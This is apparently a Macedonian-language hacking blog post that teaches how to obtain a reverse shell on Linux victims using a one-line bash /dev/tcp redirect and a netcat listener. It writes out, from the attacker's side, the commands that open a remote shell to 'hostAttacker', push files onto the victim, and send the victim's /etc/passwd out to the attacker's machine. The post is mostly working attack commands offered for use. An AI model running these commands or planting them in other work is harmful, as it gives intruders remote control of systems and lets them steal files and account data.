Во хакирањето добивање контрола врз shell-от на метата, а со тоа и (скоро) комплетен пристап до сите информации кои ги барате отсекогаш било “најсветото“ нешто при секој напад. Едно од сценаријата е и искористување на некој баг при што не се добива целосно фунционален shell пристап или пак при пишување на експлоит потребно е напаѓачот да може да добие контрола над системот. За среќен крај во приказните потребно е да се “врати“ shell и напаѓачот да го добие пристапот кој го сака/бара. За истото постојат повеќе начини, нормално, посложени и поедноставни.
Во овој постот тоа ќе го сторам “во духот“ на текстот кој го напишав за користење на netcat.
Connect-back shell на повеќето Линукс системи може да го добиете користејќи единствено bash скрипта од една линија. Ова значи дека методот ќе може да го користите и истиот ќе биде успешен во 90%+ случаеви бидејќи се што користите се веќе вградени работи. Значи не треба ништо посебно да преземате, да компaјлирате, да средувате или други чуда.
На компјутерот на напаѓачот (hostAttacker) со netcat се закачуваме на некој порт:
nc -l -v -p 1111
А на жртвата извршуваме:
$ bash -i >& /dev/tcp/hostAttacker/1111 0>&1
Да, толку е. Симпатично нели?
Исто може да го користите овој метод и да префрлите некој фајл на компјутерот жртва. Слично како и само ако користите netcat:
На напаѓачот (hostAttacker):
cat fajl.txt | nc -l -v -p 1111
А на жртвата:
bash -i >& /dev/tcp/hostAttacker/1111 0>&1 > fajl.txt
Или обратно (префрлување на фајл од жртвата на компјутерот на напаѓачот).
Напаѓач (hostAttacker):
nc -l -v -p 1111 > etcpasswd
Жртва:
cat /etc/passwd > /dev/tcp/hostAttacker/1111
итн.
Методот за socket програмирање во bash работи на Redhat, Suse, Mac OS X Leopard и веројатно други додека на Debian не е овозможено со дадената инсталација. За останатите незнам, надополнете ја листата преку коментарите откако ќе пробате.
Клучни зборови: Хакирање Софтвер NetCat Баг Информации Систем Shell Bash Reverse Shell hostAttacker Линукс
|